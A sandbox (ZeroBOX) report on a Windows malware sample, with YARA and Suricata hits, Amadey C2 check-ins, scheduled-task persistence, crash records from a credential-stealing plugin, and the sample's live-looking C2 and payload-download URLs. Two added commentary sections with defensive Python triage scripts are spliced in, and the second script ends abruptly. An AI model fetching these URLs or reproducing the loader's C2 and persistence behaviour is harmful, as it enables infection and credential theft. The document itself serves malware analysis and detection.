Summary | ZeroBOX

cent.exe

Ave Maria, RedLine stealer, Emotet, Gen1, WARZONE RAT, SmokeLoader, RedLine Stealer, Malicious Library, Confuser .NET, Malicious Packer, UPX, Admin Tool (Sysinternals etc ...), SMTP, PWS, CAB, AntiDebug, PE File, PE32, AntiVM
Category FILE
Machine s1_win7_x6403_us
Started Feb. 19, 2023, 2:01 p.m.
Completed Feb. 19, 2023, 2:04 p.m.
Size 973.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 72ae1bcbf0f8853939bbeb509fb02a06
SHA256 92d85c4a1ee5958a113f7d32c04fc9a4331f00cef182bb31e44d2240ca504e0c
CRC32 39E29D62
ssdeep 12288:XMroy90eUA2r18p9I4dL6FlhM7O1lzgyV7giL//wz3WWy3zlTBqSGwdC18LizXE:LyxsZ8pQvM7OIyYQ3xTBqSGwdu8GzXE
PDB Path wextract.pdb
Yara
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

Name Response Post-Analysis Lookup
transfer.sh 144.76.136.153
IP Address Status Action
144.76.136.153 Active Moloch
164.124.101.2 Active Moloch
176.113.115.17 Active Moloch
193.233.20.15 Active Moloch
193.233.20.16 Active Moloch
193.233.20.17 Active Moloch
45.32.218.145 Active Moloch
62.204.41.245 Active Moloch
62.204.41.88 Active Moloch
79.110.62.167 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49185 -> 193.233.20.16:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 62.204.41.245:80 -> 192.168.56.103:49190 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49190 -> 62.204.41.245:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 193.233.20.16:80 -> 192.168.56.103:49185 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 193.233.20.16:80 -> 192.168.56.103:49185 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 193.233.20.16:80 -> 192.168.56.103:49185 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 62.204.41.245:80 -> 192.168.56.103:49190 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.245:80 -> 192.168.56.103:49190 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.245:80 -> 192.168.56.103:49190 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49202 -> 79.110.62.167:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.103:49201 -> 62.204.41.88:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49201 -> 62.204.41.88:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 79.110.62.167:80 -> 192.168.56.103:49202 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 79.110.62.167:80 -> 192.168.56.103:49202 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 79.110.62.167:80 -> 192.168.56.103:49202 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49217 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49217 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 144.76.136.153:443 -> 192.168.56.103:49218 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 144.76.136.153:443 -> 192.168.56.103:49222 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 193.233.20.15:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.103:49221 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49221 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49221 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49206 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49206 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49206 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 144.76.136.153:443 -> 192.168.56.103:49207 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 193.233.20.15:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 193.233.20.15:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 193.233.20.15:80 -> 192.168.56.103:49184 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 193.233.20.15:80 -> 192.168.56.103:49184 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 193.233.20.15:80 -> 192.168.56.103:49184 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.103:49201 -> 62.204.41.88:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49201 -> 62.204.41.88:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 8.8.8.8:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 8.8.8.8:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.103:49205 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49205 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49205 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49216 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49216 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49216 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49220 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49220 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49220 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49220 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49205 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49221 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49206 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49217 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49216 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "mnolyk.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
console_handle: 0x00000007
1 1 0

Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005edb00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x8f3cac
0x8f3bce
0x8f24dd
0x8f20b6
0x8f05a0
0x8f006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8f3da0
registers.esp: 3338360
registers.edi: 3338412
registers.eax: 0
registers.ebp: 3338424
registers.edx: 6039888
registers.ebx: 3339316
registers.esi: 42005808
registers.ecx: 0
1 0 0

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72a11194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x728e2ba1
mscorlib+0x36dd36 @ 0x71c0dd36
mscorlib+0x32fea6 @ 0x71bcfea6
mscorlib+0x30ab40 @ 0x71baab40
0x55d17a2
0x55d8764
0x55d7ee1
0x55d736e
0x787752
0x7824d5
0x7820b6
0x7805a0
0x78006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72862652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7287264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72872e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729274ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72927610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x729b1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x729b1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x729b1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x729b416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 5760792
registers.edi: 0
registers.eax: 5760792
registers.ebp: 5760872
registers.edx: 0
registers.ebx: 3991048
registers.esi: 4008272
registers.ecx: 1001821059
1 0 0

__exception__

stacktrace:
0xc775f4
0xc77516
0xc724dd
0xc720b6
0xc705a0
0xc7006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x721c2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x721d264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x721d2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722874ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72287610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72311dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72311e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72311f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7231416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc776e8
registers.esp: 2683320
registers.edi: 2683372
registers.eax: 0
registers.ebp: 2683384
registers.edx: 6957392
registers.ebx: 2684276
registers.esi: 41840460
registers.ecx: 0
1 0 0

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72371194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72242ba1
mscorlib+0x36dd51 @ 0x7156dd51
mscorlib+0x32fea6 @ 0x7152fea6
mscorlib+0x30ab40 @ 0x7150ab40
0xc7d4ea
0xc7d3dd
0xc7cb59
0xc7bf7e
0xc77c87
0xc725a5
0xc720b6
0xc705a0
0xc7006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x721c2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x721d264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x721d2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722874ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72287610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72311dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72311e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72311f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7231416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 2682332
registers.edi: 0
registers.eax: 2682332
registers.ebp: 2682412
registers.edx: 0
registers.ebx: 6940168
registers.esi: 6957392
registers.ecx: 398751104
1 0 0

__exception__

stacktrace:
Save+0x8d733 Main-0x1371d cred64+0x91303 @ 0x7fef3261303
Save+0x8f34b Main-0x11b05 cred64+0x92f1b @ 0x7fef3262f1b
Save+0x903d3 Main-0x10a7d cred64+0x93fa3 @ 0x7fef3263fa3
Save+0x9077f Main-0x106d1 cred64+0x9434f @ 0x7fef326434f
Save+0xa0838 Main-0x618 cred64+0xa4408 @ 0x7fef3274408
Main+0x65 cred64+0xa4a85 @ 0x7fef3274a85
rundll32+0x2f42 @ 0xff322f42
rundll32+0x3b7a @ 0xff323b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76fd652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x776ec521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 7a
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d733 Main-0x1371d cred64+0x91303
exception.address: 0x7fef3261303
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 654
registers.rbx: 0
registers.rsp: 2488544
registers.r11: 2483440
registers.r8: 0
registers.r9: 236235718666
registers.rdx: 3395056
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0
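A reading key for the exception records above: 0xe0434f4e is not a crash. It is the CLR's EXCEPTION_HIJACK code (0xe0000000 | 'COM' + 1), which the runtime raises through RaiseException against its own threads to redirect them during suspension, so every KERNELBASE.dll/clr record with that code is runtime noise from the two .NET stages. The two 0xc0000005 records are the real faults: `mov eax, dword ptr [ecx]` with ecx = 0 at 0xc776e8 (unnamed, i.e. JIT-compiled frames above it) is a null dereference that the CLR surfaces as a managed NullReferenceException, and `cmp byte ptr [rax + r8], dil` with rax = 1, r8 = 0 inside cred64!Save under rundll32 reads address 0x1, a near-null read in the native credential plugin with no managed handler in its stack. The Python below is an added example, not part of the ZeroBOX report, that automates this reading: it parses the report's key: value record layout, decodes the exception code and, for access violations, resolves simple memory operands against the register dump to separate null-page faults from wild pointers. The three sample records are copied from the report with only the fields the code reads; the code table and the 64 KiB null-page threshold are mine.

```python
import re

# Exception codes seen in the records above. 0xc0000005 is the NTSTATUS
# access violation; 0xe0434f4e is the CLR's EXCEPTION_HIJACK ('COM' + 1),
# raised by the runtime itself to redirect its own threads.
EXCEPTION_CODES = {
    0xC0000005: "STATUS_ACCESS_VIOLATION",
    0xE0434F4E: "CLR EXCEPTION_HIJACK (runtime-internal, not an application fault)",
    0xE0434F4D: "CLR managed exception (legacy 'COM' code)",
    0xE0434352: "CLR managed exception ('CCR', .NET 4+)",
    0xE06D7363: "MSVC C++ exception ('msc')",
}

# Windows never maps the lowest 64 KiB of user address space, so a fault
# below this line is a null (or null-plus-small-offset) dereference.
NULL_PAGE_LIMIT = 0x10000

_MEM_OPERAND = re.compile(r"\[([^\]]+)\]")


def parse_record(text):
    """Turn the report's 'key: value' lines into a dict of strings."""
    rec = {}
    for line in text.splitlines():
        key, sep, val = line.partition(":")
        if sep:
            rec[key.strip()] = val.strip()
    return rec


def effective_address(instruction, registers):
    """Resolve a simple memory operand ([reg], [reg + reg], [reg + imm])
    against the register dump. Scaled or negative forms return None."""
    m = _MEM_OPERAND.search(instruction)
    if not m:
        return None
    addr = 0
    for term in m.group(1).split("+"):
        term = term.strip()
        if term.lower().startswith("0x"):
            addr += int(term, 16)
        elif term.isdigit():
            addr += int(term)
        elif term in registers:
            addr += registers[term]
        else:
            return None
    return addr


def triage(record_text):
    """Classify one exception record; registers are decimal in the report."""
    rec = parse_record(record_text)
    code = int(rec["exception.exception_code"], 16)
    regs = {k.split(".", 1)[1]: int(v)
            for k, v in rec.items() if k.startswith("registers.")}
    out = {"code": code, "meaning": EXCEPTION_CODES.get(code, "unknown"),
           "module": rec.get("exception.module", ""),
           "fault_address": None, "null_deref": False}
    if code == 0xC0000005:
        ea = effective_address(rec.get("exception.instruction", ""), regs)
        out["fault_address"] = ea
        out["null_deref"] = ea is not None and ea < NULL_PAGE_LIMIT
    return out


# Three records copied from the report above (only the fields triage reads).
CLR_HIJACK = """\
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.address: 0x7559b727
registers.esp: 5760792
registers.ecx: 1001821059
"""

X86_AV = """\
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc776e8
registers.eax: 0
registers.ecx: 0
"""

X64_AV = """\
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d733 Main-0x1371d cred64+0x91303
exception.address: 0x7fef3261303
registers.r8: 0
registers.rax: 1
"""

if __name__ == "__main__":
    for name, rec in (("clr", CLR_HIJACK), ("x86", X86_AV), ("x64", X64_AV)):
        print(name, triage(rec))
```

Only the `[reg]`, `[reg + reg]` and `[reg + imm]` operand shapes are resolved; anything with a scale factor or subtraction comes back as None rather than a wrong address, which is the safe failure for a triage script.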
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://193.233.20.15/dF30Hn4m/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.233.20.16/ti/truno.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.245/lebro.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://62.204.41.88/9vdVVVjsw/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://79.110.62.167/link/agent.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.88/lend/Underglaze.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll
request POST http://193.233.20.15/dF30Hn4m/index.php
request GET http://193.233.20.16/ti/truno.exe
request GET http://62.204.41.245/lebro.exe
request POST http://62.204.41.88/9vdVVVjsw/index.php
request GET http://79.110.62.167/link/agent.exe
request GET http://62.204.41.88/lend/Underglaze.exe
request GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll
request GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll
request GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll
request GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll
request POST http://193.233.20.15/dF30Hn4m/index.php
request POST http://62.204.41.88/9vdVVVjsw/index.php
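Every request above goes to a bare IP over plain HTTP with no User-Agent, the POSTs carry no Referer, and the GETs fetch .exe/.dll files from the same path prefixes the POST check-ins use (/dF30Hn4m/, /9vdVVVjsw/), so index.php is the C2 gate and Plugins/ the plugin store of each server. As an added example (not part of the report), the Python below reproduces the report's three feature labels from a raw HTTP request and groups the report's request lines by host into executable downloads and POST check-ins. The raw requests are constructed for the example; only their hosts and paths come from the report. The label strings match the report's wording so the output can be diffed against it.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body).
    Header names are lower-cased; a repeated header keeps its last value."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def suspicious_features(raw):
    """Derive the report's feature labels for one request."""
    method, _target, headers, _body = parse_request(raw)
    hostname = headers.get("host", "").split(":")[0]   # drop :port
    features = []
    if method == "POST" and "referer" not in headers:
        features.append("POST method with no referer header")
    if "user-agent" not in headers:
        features.append(f"{method} method with no useragent header")
    if is_ip_literal(hostname):
        features.append("Connection to IP address")
    return features


EXEC_SUFFIXES = (".exe", ".dll")


def group_by_host(request_lines):
    """Group 'request METHOD URL' lines by host: downloads vs POST check-ins."""
    by_host = defaultdict(lambda: {"downloads": set(), "posts": set(), "other": set()})
    for line in request_lines:
        parts = line.split()
        if len(parts) != 3 or parts[0] != "request":
            continue
        method, url = parts[1], parts[2]
        u = urlsplit(url)
        bucket = by_host[u.hostname]
        if method == "POST":
            bucket["posts"].add(url)
        elif u.path.lower().endswith(EXEC_SUFFIXES):
            bucket["downloads"].add(url)
        else:
            bucket["other"].add(url)
    return dict(by_host)


# Constructed raw requests; host and path come from the report, the rest is
# what a minimal WinINet client without a User-Agent would send.
CHECKIN = ("POST /dF30Hn4m/index.php HTTP/1.1\r\n"
           "Host: 193.233.20.15\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n"
           "Content-Length: 4\r\n\r\nid=1")
DOWNLOAD = "GET /ti/truno.exe HTTP/1.1\r\nHost: 193.233.20.16\r\n\r\n"
BENIGN = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
          "User-Agent: Mozilla/5.0\r\nReferer: http://www.example.com/\r\n\r\n")

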